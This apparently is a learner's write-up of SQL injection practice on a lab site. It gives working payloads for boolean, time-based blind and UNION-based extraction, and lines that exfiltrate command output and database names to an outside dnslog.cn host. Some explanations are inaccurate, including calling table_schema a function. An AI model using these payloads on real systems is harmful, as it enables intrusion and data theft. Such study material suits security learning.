Target Field#
It is obvious when opening the page that there is an injection point
By testing it with the concatenation of "and 1=1", it is found that the page can be displayed normally, and when "and 1=2" is used, the page is found to be abnormal
It is judged that it may be a numeric type
Numeric types do not need quotation marks to close, while character types need to pay attention to closing quotation marks when constructing
The "order by 3" page error indicates that there are two columns in the current database, and no echo is found in the database
and if(exists(select * from information_schema.tables limit 1),sleep(10),1)--
By using the if judgment and the exists function to query whether the table "information_schema.tables" exists
If it exists, it will delay for 10 seconds
If it does not exist, it will return the value 1, which represents true in the if judgment and will not affect the result
In simple terms, if the table "information_schema.tables" exists, it will delay for 10 seconds, and if it does not exist, the page will execute normally without delay
Execute whoami.i0f4xk.dnslog.cn in the Linux system because whoami is wrapped in backticks, so it will be executed first
Similarly, ping $(whoami).i0f4xk.dnslog.cn has the same effect as the above code
But if you directly add whoami before dns, the command will not be output
Similarly, in Windows, you can execute the command using ping %username%..i0f4xk.dnslog.cn
I am still not very clear about the principle of DNS wildcard resolution. I hope someone can explain it in detail.
?id=1 union select 1,load_file(concat("\\",(select database()),".eoumbx.dnslog.cn\abc")) --+
The page is normal but the DNS log fails to be carried out
It was found that the DNS log cannot be carried out, and then I suddenly discovered in ?id=1 and 1=2 union select 1,2 that there is actually an echo. I suddenly realized (as an interstellar player, it is difficult to find out...)
So just directly use ?id=1 and 1=2 union select 1,database() to query the current table name as "maoshe"
?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database()
information_schema is a special database defined in the SQL standard, used to store metadata of the database, including information about databases, tables, columns, constraints, permissions, etc.
table_schema is the function to query the table name in information_schema.tables
columns_name is the function to query the column name in information_schema.columns
Knowing the table name and column name, it is very easy to output the data
Through online information search, it is found that the group_concat() function can be used to output a large amount of data
For example, ?id=1 and 1=2 union select 5,group_concat(table_name) from information_schema.tables can output all the data of table_name
?id=1 and 1=2 union select 5,group_concat(column_name) from information_schema.columns where table_name ='xss'
Next, let's briefly talk about the SQL injection ideas
- Need to find the injection point
- Make judgments, whether it is a character type or a numeric type, character types need appropriate quotation marks to close, and numeric types do not need
- Use "order by" to judge the number of fields (convenient for subsequent use of echo points)
- Use union error query to judge the echo point (if there is no echo, you can only perform blind injection)
- Query the table name through "information_schema.tables" (can use limit for single query or use group_concat for query)
- Query the column name through "information_schema.columns"